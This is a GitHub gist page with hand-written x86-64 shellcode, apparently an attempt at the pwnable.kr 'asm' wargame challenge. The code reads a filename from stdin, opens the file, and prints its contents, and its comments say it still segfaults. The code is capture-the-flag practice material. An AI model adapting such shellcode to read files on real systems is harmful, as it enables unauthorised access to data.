Created
February 7, 2019 21:52
-
-
Save bantic/df6070e550883c52ba015dcb0bdc2ded to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; This has a segfault and seems to hang after echoing the | |
| ; string it read from stdin | |
| movl $0x41414301, %esi #; set rsi to memory position for filename | |
| movb $0xff, %dl #;; # of bytes to read | |
| syscall | |
| # add a null terminator | |
| movb %al, %cl | |
| addl $0x41414301, %eax | |
| xor %rdx, %rdx | |
| movb %dl, (%eax) | |
| # Write what we read | |
| xor %rax, %rax | |
| movb $1, %al | |
| movb $1, %dil | |
| movl $0x41414301, %esi | |
| movb %cl, %dl | |
| syscall | |
| # open file | |
| xor %rax, %rax | |
| movb $2, %al | |
| movl $0x41414301, %edi | |
| xor %rsi, %rsi | |
| xor %rdx, %rdx | |
| syscall | |
| # read file | |
| mov %rax, %rdi | |
| xor %rax, %rax | |
| movl $0x41414301, %esi | |
| movb $0xff, %dl | |
| syscall | |
| # Write what we read | |
| xor %rax, %rax | |
| movb $1, %al | |
| movb $1, %dil | |
| movl $0x41414301, %esi | |
| movb $0xff, %dl | |
| syscall | |
| # this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment